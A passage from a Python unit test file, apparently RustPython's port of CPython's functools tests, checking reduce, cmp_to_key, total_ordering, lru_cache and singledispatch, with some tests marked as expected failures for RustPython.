self.reduce(add, [['a', 'c'], [], ['d', 'w']], []),
['a','c','d','w']
)
self.assertEqual(self.reduce(lambda x, y: x*y, range(2,8), 1), 5040)
self.assertEqual(
self.reduce(lambda x, y: x*y, range(2,21), 1),
2432902008176640000
)
self.assertEqual(self.reduce(add, Squares(10)), 285)
self.assertEqual(self.reduce(add, Squares(10), 0), 285)
self.assertEqual(self.reduce(add, Squares(0), 0), 0)
self.assertRaises(TypeError, self.reduce)
self.assertRaises(TypeError, self.reduce, 42, 42)
self.assertRaises(TypeError, self.reduce, 42, 42, 42)
self.assertEqual(self.reduce(42, "1"), "1") # func is never called with one item
self.assertEqual(self.reduce(42, "", "1"), "1") # func is never called with one item
self.assertRaises(TypeError, self.reduce, 42, (42, 42))
self.assertRaises(TypeError, self.reduce, add, []) # arg 2 must not be empty sequence with no initial value
self.assertRaises(TypeError, self.reduce, add, "")
self.assertRaises(TypeError, self.reduce, add, ())
self.assertRaises(TypeError, self.reduce, add, object())
class TestFailingIter:
def __iter__(self):
raise RuntimeError
self.assertRaises(RuntimeError, self.reduce, add, TestFailingIter())
self.assertEqual(self.reduce(add, [], None), None)
self.assertEqual(self.reduce(add, [], 42), 42)
class BadSeq:
def __getitem__(self, index):
raise ValueError
self.assertRaises(ValueError, self.reduce, 42, BadSeq())
# Test reduce()'s use of iterators.
def test_iterator_usage(self):
class SequenceClass:
def __init__(self, n):
self.n = n
def __getitem__(self, i):
if 0 <= i < self.n:
return i
else:
raise IndexError
from operator import add
self.assertEqual(self.reduce(add, SequenceClass(5)), 10)
self.assertEqual(self.reduce(add, SequenceClass(5), 42), 52)
self.assertRaises(TypeError, self.reduce, add, SequenceClass(0))
self.assertEqual(self.reduce(add, SequenceClass(0), 42), 42)
self.assertEqual(self.reduce(add, SequenceClass(1)), 0)
self.assertEqual(self.reduce(add, SequenceClass(1), 42), 42)
d = {"one": 1, "two": 2, "three": 3}
self.assertEqual(self.reduce(add, d), "".join(d.keys()))
@unittest.skipUnless(c_functools, 'requires the C _functools module')
class TestReduceC(TestReduce, unittest.TestCase):
if c_functools:
reduce = c_functools.reduce
class TestReducePy(TestReduce, unittest.TestCase):
reduce = staticmethod(py_functools.reduce)
class TestCmpToKey:
def test_cmp_to_key(self):
def cmp1(x, y):
return (x > y) - (x < y)
key = self.cmp_to_key(cmp1)
self.assertEqual(key(3), key(3))
self.assertGreater(key(3), key(1))
self.assertGreaterEqual(key(3), key(3))
def cmp2(x, y):
return int(x) - int(y)
key = self.cmp_to_key(cmp2)
self.assertEqual(key(4.0), key('4'))
self.assertLess(key(2), key('35'))
self.assertLessEqual(key(2), key('35'))
self.assertNotEqual(key(2), key('35'))
def test_cmp_to_key_arguments(self):
def cmp1(x, y):
return (x > y) - (x < y)
key = self.cmp_to_key(mycmp=cmp1)
self.assertEqual(key(obj=3), key(obj=3))
self.assertGreater(key(obj=3), key(obj=1))
with self.assertRaises((TypeError, AttributeError)):
key(3) > 1 # rhs is not a K object
with self.assertRaises((TypeError, AttributeError)):
1 < key(3) # lhs is not a K object
with self.assertRaises(TypeError):
key = self.cmp_to_key() # too few args
with self.assertRaises(TypeError):
key = self.cmp_to_key(cmp1, None) # too many args
key = self.cmp_to_key(cmp1)
with self.assertRaises(TypeError):
key() # too few args
with self.assertRaises(TypeError):
key(None, None) # too many args
def test_bad_cmp(self):
def cmp1(x, y):
raise ZeroDivisionError
key = self.cmp_to_key(cmp1)
with self.assertRaises(ZeroDivisionError):
key(3) > key(1)
class BadCmp:
def __lt__(self, other):
raise ZeroDivisionError
def cmp1(x, y):
return BadCmp()
with self.assertRaises(ZeroDivisionError):
key(3) > key(1)
def test_obj_field(self):
def cmp1(x, y):
return (x > y) - (x < y)
key = self.cmp_to_key(mycmp=cmp1)
self.assertEqual(key(50).obj, 50)
def test_sort_int(self):
def mycmp(x, y):
return y - x
self.assertEqual(sorted(range(5), key=self.cmp_to_key(mycmp)),
[4, 3, 2, 1, 0])
def test_sort_int_str(self):
def mycmp(x, y):
x, y = int(x), int(y)
return (x > y) - (x < y)
values = [5, '3', 7, 2, '0', '1', 4, '10', 1]
values = sorted(values, key=self.cmp_to_key(mycmp))
self.assertEqual([int(value) for value in values],
[0, 1, 1, 2, 3, 4, 5, 7, 10])
def test_hash(self):
def mycmp(x, y):
return y - x
key = self.cmp_to_key(mycmp)
k = key(10)
self.assertRaises(TypeError, hash, k)
self.assertNotIsInstance(k, collections.abc.Hashable)
@unittest.skipUnless(c_functools, 'requires the C _functools module')
class TestCmpToKeyC(TestCmpToKey, unittest.TestCase):
if c_functools:
cmp_to_key = c_functools.cmp_to_key
# TODO: RUSTPYTHON
@unittest.expectedFailure
def test_bad_cmp(self):
super().test_bad_cmp()
# TODO: RUSTPYTHON
@unittest.expectedFailure
def test_cmp_to_key(self):
super().test_cmp_to_key()
# TODO: RUSTPYTHON
@unittest.expectedFailure
def test_cmp_to_key_arguments(self):
super().test_cmp_to_key_arguments()
# TODO: RUSTPYTHON
@unittest.expectedFailure
def test_hash(self):
super().test_hash()
# TODO: RUSTPYTHON
@unittest.expectedFailure
def test_obj_field(self):
super().test_obj_field()
# TODO: RUSTPYTHON
@unittest.expectedFailure
def test_sort_int(self):
super().test_sort_int()
# TODO: RUSTPYTHON
@unittest.expectedFailure
def test_sort_int_str(self):
super().test_sort_int_str()
class TestCmpToKeyPy(TestCmpToKey, unittest.TestCase):
cmp_to_key = staticmethod(py_functools.cmp_to_key)
class TestTotalOrdering(unittest.TestCase):
def test_total_ordering_lt(self):
@functools.total_ordering
class A:
def __init__(self, value):
self.value = value
def __lt__(self, other):
return self.value < other.value
def __eq__(self, other):
return self.value == other.value
self.assertTrue(A(1) < A(2))
self.assertTrue(A(2) > A(1))
self.assertTrue(A(1) <= A(2))
self.assertTrue(A(2) >= A(1))
self.assertTrue(A(2) <= A(2))
self.assertTrue(A(2) >= A(2))
self.assertFalse(A(1) > A(2))
def test_total_ordering_le(self):
@functools.total_ordering
class A:
def __init__(self, value):
self.value = value
def __le__(self, other):
return self.value <= other.value
def __eq__(self, other):
return self.value == other.value
self.assertTrue(A(1) < A(2))
self.assertTrue(A(2) > A(1))
self.assertTrue(A(1) <= A(2))
self.assertTrue(A(2) >= A(1))
self.assertTrue(A(2) <= A(2))
self.assertTrue(A(2) >= A(2))
self.assertFalse(A(1) >= A(2))
def test_total_ordering_gt(self):
@functools.total_ordering
class A:
def __init__(self, value):
self.value = value
def __gt__(self, other):
return self.value > other.value
def __eq__(self, other):
return self.value == other.value
self.assertTrue(A(1) < A(2))
self.assertTrue(A(2) > A(1))
self.assertTrue(A(1) <= A(2))
self.assertTrue(A(2) >= A(1))
self.assertTrue(A(2) <= A(2))
self.assertTrue(A(2) >= A(2))
self.assertFalse(A(2) < A(1))
def test_total_ordering_ge(self):
@functools.total_ordering
class A:
def __init__(self, value):
self.value = value
def __ge__(self, other):
return self.value >= other.value
def __eq__(self, other):
return self.value == other.value
self.assertTrue(A(1) < A(2))
self.assertTrue(A(2) > A(1))
self.assertTrue(A(1) <= A(2))
self.assertTrue(A(2) >= A(1))
self.assertTrue(A(2) <= A(2))
self.assertTrue(A(2) >= A(2))
self.assertFalse(A(2) <= A(1))
def test_total_ordering_no_overwrite(self):
# new methods should not overwrite existing
@functools.total_ordering
class A(int):
pass
self.assertTrue(A(1) < A(2))
self.assertTrue(A(2) > A(1))
self.assertTrue(A(1) <= A(2))
self.assertTrue(A(2) >= A(1))
self.assertTrue(A(2) <= A(2))
self.assertTrue(A(2) >= A(2))
def test_no_operations_defined(self):
with self.assertRaises(ValueError):
@functools.total_ordering
class A:
pass
def test_type_error_when_not_implemented(self):
# bug 10042; ensure stack overflow does not occur
# when decorated types return NotImplemented
@functools.total_ordering
class ImplementsLessThan:
def __init__(self, value):
self.value = value
def __eq__(self, other):
if isinstance(other, ImplementsLessThan):
return self.value == other.value
return False
def __lt__(self, other):
if isinstance(other, ImplementsLessThan):
return self.value < other.value
return NotImplemented
@functools.total_ordering
class ImplementsGreaterThan:
def __init__(self, value):
self.value = value
def __eq__(self, other):
if isinstance(other, ImplementsGreaterThan):
return self.value == other.value
return False
def __gt__(self, other):
if isinstance(other, ImplementsGreaterThan):
return self.value > other.value
return NotImplemented
@functools.total_ordering
class ImplementsLessThanEqualTo:
def __init__(self, value):
self.value = value
def __eq__(self, other):
if isinstance(other, ImplementsLessThanEqualTo):
return self.value == other.value
return False
def __le__(self, other):
if isinstance(other, ImplementsLessThanEqualTo):
return self.value <= other.value
return NotImplemented
@functools.total_ordering
class ImplementsGreaterThanEqualTo:
def __init__(self, value):
self.value = value
def __eq__(self, other):
if isinstance(other, ImplementsGreaterThanEqualTo):
return self.value == other.value
return False
def __ge__(self, other):
if isinstance(other, ImplementsGreaterThanEqualTo):
return self.value >= other.value
return NotImplemented
@functools.total_ordering
class ComparatorNotImplemented:
def __init__(self, value):
self.value = value
def __eq__(self, other):
if isinstance(other, ComparatorNotImplemented):
return self.value == other.value
return False
def __lt__(self, other):
return NotImplemented
with self.subTest("LT < 1"), self.assertRaises(TypeError):
ImplementsLessThan(-1) < 1
with self.subTest("LT < LE"), self.assertRaises(TypeError):
ImplementsLessThan(0) < ImplementsLessThanEqualTo(0)
with self.subTest("LT < GT"), self.assertRaises(TypeError):
ImplementsLessThan(1) < ImplementsGreaterThan(1)
with self.subTest("LE <= LT"), self.assertRaises(TypeError):
ImplementsLessThanEqualTo(2) <= ImplementsLessThan(2)
with self.subTest("LE <= GE"), self.assertRaises(TypeError):
ImplementsLessThanEqualTo(3) <= ImplementsGreaterThanEqualTo(3)
with self.subTest("GT > GE"), self.assertRaises(TypeError):
ImplementsGreaterThan(4) > ImplementsGreaterThanEqualTo(4)
with self.subTest("GT > LT"), self.assertRaises(TypeError):
ImplementsGreaterThan(5) > ImplementsLessThan(5)
with self.subTest("GE >= GT"), self.assertRaises(TypeError):
ImplementsGreaterThanEqualTo(6) >= ImplementsGreaterThan(6)
with self.subTest("GE >= LE"), self.assertRaises(TypeError):
ImplementsGreaterThanEqualTo(7) >= ImplementsLessThanEqualTo(7)
with self.subTest("GE when equal"):
a = ComparatorNotImplemented(8)
b = ComparatorNotImplemented(8)
self.assertEqual(a, b)
with self.assertRaises(TypeError):
a >= b
with self.subTest("LE when equal"):
a = ComparatorNotImplemented(9)
b = ComparatorNotImplemented(9)
self.assertEqual(a, b)
with self.assertRaises(TypeError):
a <= b
def test_pickle(self):
for proto in range(pickle.HIGHEST_PROTOCOL + 1):
for name in '__lt__', '__gt__', '__le__', '__ge__':
with self.subTest(method=name, proto=proto):
method = getattr(Orderable_LT, name)
method_copy = pickle.loads(pickle.dumps(method, proto))
self.assertIs(method_copy, method)
@functools.total_ordering
class Orderable_LT:
def __init__(self, value):
self.value = value
def __lt__(self, other):
return self.value < other.value
def __eq__(self, other):
return self.value == other.value
class TestLRU:
def test_lru(self):
def orig(x, y):
return 3 * x + y
f = self.module.lru_cache(maxsize=20)(orig)
hits, misses, maxsize, currsize = f.cache_info()
self.assertEqual(maxsize, 20)
self.assertEqual(currsize, 0)
self.assertEqual(hits, 0)
self.assertEqual(misses, 0)
domain = range(5)
for i in range(1000):
x, y = choice(domain), choice(domain)
actual = f(x, y)
expected = orig(x, y)
self.assertEqual(actual, expected)
hits, misses, maxsize, currsize = f.cache_info()
self.assertTrue(hits > misses)
self.assertEqual(hits + misses, 1000)
self.assertEqual(currsize, 20)
f.cache_clear() # test clearing
hits, misses, maxsize, currsize = f.cache_info()
self.assertEqual(hits, 0)
self.assertEqual(misses, 0)
self.assertEqual(currsize, 0)
f(x, y)
hits, misses, maxsize, currsize = f.cache_info()
self.assertEqual(hits, 0)
self.assertEqual(misses, 1)
self.assertEqual(currsize, 1)
# Test bypassing the cache
self.assertIs(f.__wrapped__, orig)
f.__wrapped__(x, y)
hits, misses, maxsize, currsize = f.cache_info()
self.assertEqual(hits, 0)
self.assertEqual(misses, 1)
self.assertEqual(currsize, 1)
# test size zero (which means "never-cache")
@self.module.lru_cache(0)
def f():
nonlocal f_cnt
f_cnt += 1
return 20
self.assertEqual(f.cache_info().maxsize, 0)
f_cnt = 0
for i in range(5):
self.assertEqual(f(), 20)
self.assertEqual(f_cnt, 5)
hits, misses, maxsize, currsize = f.cache_info()
self.assertEqual(hits, 0)
self.assertEqual(misses, 5)
self.assertEqual(currsize, 0)
# test size one
@self.module.lru_cache(1)
def f():
nonlocal f_cnt
f_cnt += 1
return 20
self.assertEqual(f.cache_info().maxsize, 1)
f_cnt = 0
for i in range(5):
self.assertEqual(f(), 20)
self.assertEqual(f_cnt, 1)
hits, misses, maxsize, currsize = f.cache_info()
self.assertEqual(hits, 4)
self.assertEqual(misses, 1)
self.assertEqual(currsize, 1)
# test size two
@self.module.lru_cache(2)
def f(x):
nonlocal f_cnt
f_cnt += 1
return x*10
self.assertEqual(f.cache_info().maxsize, 2)
f_cnt = 0
for x in 7, 9, 7, 9, 7, 9, 8, 8, 8, 9, 9, 9, 8, 8, 8, 7:
# * * * *
self.assertEqual(f(x), x*10)
self.assertEqual(f_cnt, 4)
hits, misses, maxsize, currsize = f.cache_info()
self.assertEqual(hits, 12)
self.assertEqual(misses, 4)
self.assertEqual(currsize, 2)
def test_lru_no_args(self):
@self.module.lru_cache
def square(x):
return x ** 2
self.assertEqual(list(map(square, [10, 20, 10])),
[100, 400, 100])
self.assertEqual(square.cache_info().hits, 1)
self.assertEqual(square.cache_info().misses, 2)
self.assertEqual(square.cache_info().maxsize, 128)
self.assertEqual(square.cache_info().currsize, 2)
def test_lru_bug_35780(self):
# C version of the lru_cache was not checking to see if
# the user function call has already modified the cache
# (this arises in recursive calls and in multi-threading).
# This cause the cache to have orphan links not referenced
# by the cache dictionary.
once = True # Modified by f(x) below
@self.module.lru_cache(maxsize=10)
def f(x):
nonlocal once
rv = f'.{x}.'
if x == 20 and once:
once = False
rv = f(x)
return rv
# Fill the cache
for x in range(15):
self.assertEqual(f(x), f'.{x}.')
self.assertEqual(f.cache_info().currsize, 10)
# Make a recursive call and make sure the cache remains full
self.assertEqual(f(20), '.20.')
self.assertEqual(f.cache_info().currsize, 10)
def test_lru_bug_36650(self):
# C version of lru_cache was treating a call with an empty **kwargs
# dictionary as being distinct from a call with no keywords at all.
# This did not result in an incorrect answer, but it did trigger
# an unexpected cache miss.
@self.module.lru_cache()
def f(x):
pass
f(0)
f(0, **{})
self.assertEqual(f.cache_info().hits, 1)
def test_lru_hash_only_once(self):
# To protect against weird reentrancy bugs and to improve
# efficiency when faced with slow __hash__ methods, the
# LRU cache guarantees that it will only call __hash__
# only once per use as an argument to the cached function.
@self.module.lru_cache(maxsize=1)
def f(x, y):
return x * 3 + y
# Simulate the integer 5
mock_int = unittest.mock.Mock()
mock_int.__mul__ = unittest.mock.Mock(return_value=15)
mock_int.__hash__ = unittest.mock.Mock(return_value=999)
# Add to cache: One use as an argument gives one call
self.assertEqual(f(mock_int, 1), 16)
self.assertEqual(mock_int.__hash__.call_count, 1)
self.assertEqual(f.cache_info(), (0, 1, 1, 1))
# Cache hit: One use as an argument gives one additional call
self.assertEqual(f(mock_int, 1), 16)
self.assertEqual(mock_int.__hash__.call_count, 2)
self.assertEqual(f.cache_info(), (1, 1, 1, 1))
# Cache eviction: No use as an argument gives no additional call
self.assertEqual(f(6, 2), 20)
self.assertEqual(mock_int.__hash__.call_count, 2)
self.assertEqual(f.cache_info(), (1, 2, 1, 1))
# Cache miss: One use as an argument gives one additional call
self.assertEqual(f(mock_int, 1), 16)
self.assertEqual(mock_int.__hash__.call_count, 3)
self.assertEqual(f.cache_info(), (1, 3, 1, 1))
def test_lru_reentrancy_with_len(self):
# Test to make sure the LRU cache code isn't thrown-off by
# caching the built-in len() function. Since len() can be
# cached, we shouldn't use it inside the lru code itself.
old_len = builtins.len
try:
builtins.len = self.module.lru_cache(4)(len)
for i in [0, 0, 1, 2, 3, 3, 4, 5, 6, 1, 7, 2, 1]:
self.assertEqual(len('abcdefghijklmn'[:i]), i)
finally:
builtins.len = old_len
def test_lru_star_arg_handling(self):
# Test regression that arose in ea064ff3c10f
@functools.lru_cache()
def f(*args):
return args
self.assertEqual(f(1, 2), (1, 2))
self.assertEqual(f((1, 2)), ((1, 2),))
def test_lru_type_error(self):
# Regression test for issue #28653.
# lru_cache was leaking when one of the arguments
# wasn't cacheable.
@functools.lru_cache(maxsize=None)
def infinite_cache(o):
pass
@functools.lru_cache(maxsize=10)
def limited_cache(o):
pass
with self.assertRaises(TypeError):
infinite_cache([])
with self.assertRaises(TypeError):
limited_cache([])
def test_lru_with_maxsize_none(self):
@self.module.lru_cache(maxsize=None)
def fib(n):
if n < 2:
return n
return fib(n-1) + fib(n-2)
self.assertEqual([fib(n) for n in range(16)],
[0, 1, 1, 2, 3, 5, 8, 13, 21, 34, 55, 89, 144, 233, 377, 610])
self.assertEqual(fib.cache_info(),
self.module._CacheInfo(hits=28, misses=16, maxsize=None, currsize=16))
fib.cache_clear()
self.assertEqual(fib.cache_info(),
self.module._CacheInfo(hits=0, misses=0, maxsize=None, currsize=0))
def test_lru_with_maxsize_negative(self):
@self.module.lru_cache(maxsize=-10)
def eq(n):
return n
for i in (0, 1):
self.assertEqual([eq(n) for n in range(150)], list(range(150)))
self.assertEqual(eq.cache_info(),
self.module._CacheInfo(hits=0, misses=300, maxsize=0, currsize=0))
def test_lru_with_exceptions(self):
# Verify that user_function exceptions get passed through without
# creating a hard-to-read chained exception.
# http://bugs.python.org/issue13177
for maxsize in (None, 128):
@self.module.lru_cache(maxsize)
def func(i):
return 'abc'[i]
self.assertEqual(func(0), 'a')
with self.assertRaises(IndexError) as cm:
func(15)
self.assertIsNone(cm.exception.__context__)
# Verify that the previous exception did not result in a cached entry
with self.assertRaises(IndexError):
func(15)
def test_lru_with_types(self):
for maxsize in (None, 128):
@self.module.lru_cache(maxsize=maxsize, typed=True)
def square(x):
return x * x
self.assertEqual(square(3), 9)
self.assertEqual(type(square(3)), type(9))
self.assertEqual(square(3.0), 9.0)
self.assertEqual(type(square(3.0)), type(9.0))
self.assertEqual(square(x=3), 9)
self.assertEqual(type(square(x=3)), type(9))
self.assertEqual(square(x=3.0), 9.0)
self.assertEqual(type(square(x=3.0)), type(9.0))
self.assertEqual(square.cache_info().hits, 4)
self.assertEqual(square.cache_info().misses, 4)
def test_lru_with_keyword_args(self):
@self.module.lru_cache()
def fib(n):
if n < 2:
return n
return fib(n=n-1) + fib(n=n-2)
self.assertEqual(
[fib(n=number) for number in range(16)],
[0, 1, 1, 2, 3, 5, 8, 13, 21, 34, 55, 89, 144, 233, 377, 610]
)
self.assertEqual(fib.cache_info(),
self.module._CacheInfo(hits=28, misses=16, maxsize=128, currsize=16))
fib.cache_clear()
self.assertEqual(fib.cache_info(),
self.module._CacheInfo(hits=0, misses=0, maxsize=128, currsize=0))
def test_lru_with_keyword_args_maxsize_none(self):
@self.module.lru_cache(maxsize=None)
def fib(n):
if n < 2:
return n
return fib(n=n-1) + fib(n=n-2)
self.assertEqual([fib(n=number) for number in range(16)],
[0, 1, 1, 2, 3, 5, 8, 13, 21, 34, 55, 89, 144, 233, 377, 610])
self.assertEqual(fib.cache_info(),
self.module._CacheInfo(hits=28, misses=16, maxsize=None, currsize=16))
fib.cache_clear()
self.assertEqual(fib.cache_info(),
self.module._CacheInfo(hits=0, misses=0, maxsize=None, currsize=0))
def test_kwargs_order(self):
# PEP 468: Preserving Keyword Argument Order
@self.module.lru_cache(maxsize=10)
def f(**kwargs):
return list(kwargs.items())
self.assertEqual(f(a=1, b=2), [('a', 1), ('b', 2)])
self.assertEqual(f(b=2, a=1), [('b', 2), ('a', 1)])
self.assertEqual(f.cache_info(),
self.module._CacheInfo(hits=0, misses=2, maxsize=10, currsize=2))
def test_lru_cache_decoration(self):
def f(zomg: 'zomg_annotation'):
"""f doc string"""
return 42
g = self.module.lru_cache()(f)
for attr in self.module.WRAPPER_ASSIGNMENTS:
self.assertEqual(getattr(g, attr), getattr(f, attr))
# TODO: RUSTPYTHON
@unittest.expectedFailure
def test_lru_cache_threaded(self):
n, m = 5, 11
def orig(x, y):
return 3 * x + y
f = self.module.lru_cache(maxsize=n*m)(orig)
hits, misses, maxsize, currsize = f.cache_info()
self.assertEqual(currsize, 0)
start = threading.Event()
def full(k):
start.wait(10)
for _ in range(m):
self.assertEqual(f(k, 0), orig(k, 0))
def clear():
start.wait(10)
for _ in range(2*m):
f.cache_clear()
orig_si = sys.getswitchinterval()
support.setswitchinterval(1e-6)
try:
# create n threads in order to fill cache
threads = [threading.Thread(target=full, args=[k])
for k in range(n)]
with support.start_threads(threads):
start.set()
hits, misses, maxsize, currsize = f.cache_info()
if self.module is py_functools:
# XXX: Why can be not equal?
self.assertLessEqual(misses, n)
self.assertLessEqual(hits, m*n - misses)
else:
self.assertEqual(misses, n)
self.assertEqual(hits, m*n - misses)
self.assertEqual(currsize, n)
# create n threads in order to fill cache and 1 to clear it
threads = [threading.Thread(target=clear)]
threads += [threading.Thread(target=full, args=[k])
for k in range(n)]
start.clear()
with support.start_threads(threads):
start.set()
finally:
sys.setswitchinterval(orig_si)
def test_lru_cache_threaded2(self):
# Simultaneous call with the same arguments
n, m = 5, 7
start = threading.Barrier(n+1)
pause = threading.Barrier(n+1)
stop = threading.Barrier(n+1)
@self.module.lru_cache(maxsize=m*n)
def f(x):
pause.wait(10)
return 3 * x
self.assertEqual(f.cache_info(), (0, 0, m*n, 0))
def test():
for i in range(m):
start.wait(10)
self.assertEqual(f(i), 3 * i)
stop.wait(10)
threads = [threading.Thread(target=test) for k in range(n)]
with support.start_threads(threads):
for i in range(m):
start.wait(10)
stop.reset()
pause.wait(10)
start.reset()
stop.wait(10)
pause.reset()
self.assertEqual(f.cache_info(), (0, (i+1)*n, m*n, i+1))
def test_lru_cache_threaded3(self):
@self.module.lru_cache(maxsize=2)
def f(x):
time.sleep(.01)
return 3 * x
def test(i, x):
with self.subTest(thread=i):
self.assertEqual(f(x), 3 * x, i)
threads = [threading.Thread(target=test, args=(i, v))
for i, v in enumerate([1, 2, 2, 3, 2])]
with support.start_threads(threads):
pass
def test_need_for_rlock(self):
# This will deadlock on an LRU cache that uses a regular lock
@self.module.lru_cache(maxsize=10)
def test_func(x):
'Used to demonstrate a reentrant lru_cache call within a single thread'
return x
class DoubleEq:
'Demonstrate a reentrant lru_cache call within a single thread'
def __init__(self, x):
self.x = x
def __hash__(self):
return self.x
def __eq__(self, other):
if self.x == 2:
test_func(DoubleEq(1))
return self.x == other.x
test_func(DoubleEq(1)) # Load the cache
test_func(DoubleEq(2)) # Load the cache
self.assertEqual(test_func(DoubleEq(2)), # Trigger a re-entrant __eq__ call
DoubleEq(2)) # Verify the correct return value
def test_lru_method(self):
class X(int):
f_cnt = 0
@self.module.lru_cache(2)
def f(self, x):
self.f_cnt += 1
return x*10+self
a = X(5)
b = X(5)
c = X(7)
self.assertEqual(X.f.cache_info(), (0, 0, 2, 0))
for x in 1, 2, 2, 3, 1, 1, 1, 2, 3, 3:
self.assertEqual(a.f(x), x*10 + 5)
self.assertEqual((a.f_cnt, b.f_cnt, c.f_cnt), (6, 0, 0))
self.assertEqual(X.f.cache_info(), (4, 6, 2, 2))
for x in 1, 2, 1, 1, 1, 1, 3, 2, 2, 2:
self.assertEqual(b.f(x), x*10 + 5)
self.assertEqual((a.f_cnt, b.f_cnt, c.f_cnt), (6, 4, 0))
self.assertEqual(X.f.cache_info(), (10, 10, 2, 2))
for x in 2, 1, 1, 1, 1, 2, 1, 3, 2, 1:
self.assertEqual(c.f(x), x*10 + 7)
self.assertEqual((a.f_cnt, b.f_cnt, c.f_cnt), (6, 4, 5))
self.assertEqual(X.f.cache_info(), (15, 15, 2, 2))
self.assertEqual(a.f.cache_info(), X.f.cache_info())
self.assertEqual(b.f.cache_info(), X.f.cache_info())
self.assertEqual(c.f.cache_info(), X.f.cache_info())
def test_pickle(self):
cls = self.__class__
for f in cls.cached_func[0], cls.cached_meth, cls.cached_staticmeth:
for proto in range(pickle.HIGHEST_PROTOCOL + 1):
with self.subTest(proto=proto, func=f):
f_copy = pickle.loads(pickle.dumps(f, proto))
self.assertIs(f_copy, f)
def test_copy(self):
cls = self.__class__
def orig(x, y):
return 3 * x + y
part = self.module.partial(orig, 2)
funcs = (cls.cached_func[0], cls.cached_meth, cls.cached_staticmeth,
self.module.lru_cache(2)(part))
for f in funcs:
with self.subTest(func=f):
f_copy = copy.copy(f)
self.assertIs(f_copy, f)
def test_deepcopy(self):
cls = self.__class__
def orig(x, y):
return 3 * x + y
part = self.module.partial(orig, 2)
funcs = (cls.cached_func[0], cls.cached_meth, cls.cached_staticmeth,
self.module.lru_cache(2)(part))
for f in funcs:
with self.subTest(func=f):
f_copy = copy.deepcopy(f)
self.assertIs(f_copy, f)
@py_functools.lru_cache()
def py_cached_func(x, y):
return 3 * x + y
@c_functools.lru_cache()
def c_cached_func(x, y):
return 3 * x + y
class TestLRUPy(TestLRU, unittest.TestCase):
module = py_functools
cached_func = py_cached_func,
@module.lru_cache()
def cached_meth(self, x, y):
return 3 * x + y
@staticmethod
@module.lru_cache()
def cached_staticmeth(x, y):
return 3 * x + y
class TestLRUC(TestLRU, unittest.TestCase):
module = c_functools
cached_func = c_cached_func,
@module.lru_cache()
def cached_meth(self, x, y):
return 3 * x + y
@staticmethod
@module.lru_cache()
def cached_staticmeth(x, y):
return 3 * x + y
class TestSingleDispatch(unittest.TestCase):
def test_simple_overloads(self):
@functools.singledispatch
def g(obj):
return "base"
def g_int(i):
return "integer"
g.register(int, g_int)
self.assertEqual(g("str"), "base")
self.assertEqual(g(1), "integer")
self.assertEqual(g([1,2,3]), "base")
def test_mro(self):
@functools.singledispatch
def g(obj):
return "base"
class A:
pass
class C(A):
pass
class B(A):
pass
class D(C, B):
pass
def g_A(a):
return "A"
def g_B(b):
return "B"
g.register(A, g_A)
g.register(B, g_B)
self.assertEqual(g(A()), "A")
self.assertEqual(g(B()), "B")
self.assertEqual(g(C()), "A")
self.assertEqual(g(D()), "B")
def test_register_decorator(self):
@functools.singledispatch
def g(obj):
return "base"
@g.register(int)
def g_int(i):
return "int %s" % (i,)
self.assertEqual(g(""), "base")
self.assertEqual(g(12), "int 12")
self.assertIs(g.dispatch(int), g_int)
self.assertIs(g.dispatch(object), g.dispatch(str))
# Note: in the assert above this is not g.
# @singledispatch returns the wrapper.
def test_wrapping_attributes(self):
@functools.singledispatch
def g(obj):
"Simple test"
return "Test"
self.assertEqual(g.__name__, "g")
if sys.flags.optimize < 2:
self.assertEqual(g.__doc__, "Simple test")
@unittest.skipUnless(decimal, 'requires _decimal')
@support.cpython_only
def test_c_classes(self):
@functools.singledispatch
def g(obj):
return "base"
@g.register(decimal.DecimalException)
def _(obj):
return obj.args
subn = decimal.Subnormal("Exponent < Emin")
rnd = decimal.Rounded("Number got rounded")
self.assertEqual(g(subn), ("Exponent < Emin",))
self.assertEqual(g(rnd), ("Number got rounded",))
@g.register(decimal.Subnormal)
def _(obj):
return "Too small to care."
self.assertEqual(g(subn), "Too small to care.")
self.assertEqual(g(rnd), ("Number got rounded",))
def test_compose_mro(self):
# None of the examples in this test depend on haystack ordering.
c = collections.abc
mro = functools._compose_mro
bases = [c.Sequence, c.MutableMapping, c.Mapping, c.Set]
for haystack in permutations(bases):
m = mro(dict, haystack)
self.assertEqual(m, [dict, c.MutableMapping, c.Mapping,
c.Collection, c.Sized, c.Iterable,
c.Container, object])
bases = [c.Container, c.Mapping, c.MutableMapping, collections.OrderedDict]
for haystack in permutations(bases):
m = mro(collections.ChainMap, haystack)
self.assertEqual(m, [collections.ChainMap, c.MutableMapping, c.Mapping,
c.Collection, c.Sized, c.Iterable,
c.Container, object])
# If there's a generic function with implementations registered for
# both Sized and Container, passing a defaultdict to it results in an
# ambiguous dispatch which will cause a RuntimeError (see
# test_mro_conflicts).
bases = [c.Container, c.Sized, str]
for haystack in permutations(bases):
m = mro(collections.defaultdict, [c.Sized, c.Container, str])
self.assertEqual(m, [collections.defaultdict, dict, c.Sized,
c.Container, object])
# MutableSequence below is registered directly on D. In other words, it
# precedes MutableMapping which means single dispatch will always
# choose MutableSequence here.
class D(collections.defaultdict):
pass
c.MutableSequence.register(D)
bases = [c.MutableSequence, c.MutableMapping]
for haystack in permutations(bases):
m = mro(D, bases)
self.assertEqual(m, [D, c.MutableSequence, c.Sequence, c.Reversible,
collections.defaultdict, dict, c.MutableMapping, c.Mapping,
c.Collection, c.Sized, c.Iterable, c.Container,
object])
# Container and Callable are registered on different base classes and
# a generic function supporting both should always pick the Callable
# implementation if a C instance is passed.
class C(collections.defaultdict):
def __call__(self):
pass
bases = [c.Sized, c.Callable, c.Container, c.Mapping]
for haystack in permutations(bases):
m = mro(C, haystack)
self.assertEqual(m, [C, c.Callable, collections.defaultdict, dict, c.Mapping,
c.Collection, c.Sized, c.Iterable,
c.Container, object])
def test_register_abc(self):
c = collections.abc
d = {"a": "b"}
l = [1, 2, 3]
s = {object(), None}
f = frozenset(s)
t = (1, 2, 3)
@functools.singledispatch
def g(obj):
return "base"
self.assertEqual(g(d), "base")
self.assertEqual(g(l), "base")
self.assertEqual(g(s), "base")
self.assertEqual(g(f), "base")
self.assertEqual(g(t), "base")
g.register(c.Sized, lambda obj: "sized")
self.assertEqual(g(d), "sized")
self.assertEqual(g(l), "sized")
self.assertEqual(g(s), "sized")
self.assertEqual(g(f), "sized")
self.assertEqual(g(t), "sized")
g.register(c.MutableMapping, lambda obj: "mutablemapping")
self.assertEqual(g(d), "mutablemapping")
self.assertEqual(g(l), "sized")
self.assertEqual(g(s), "sized")
self.assertEqual(g(f), "sized")
self.assertEqual(g(t), "sized")
g.register(collections.ChainMap, lambda obj: "chainmap")
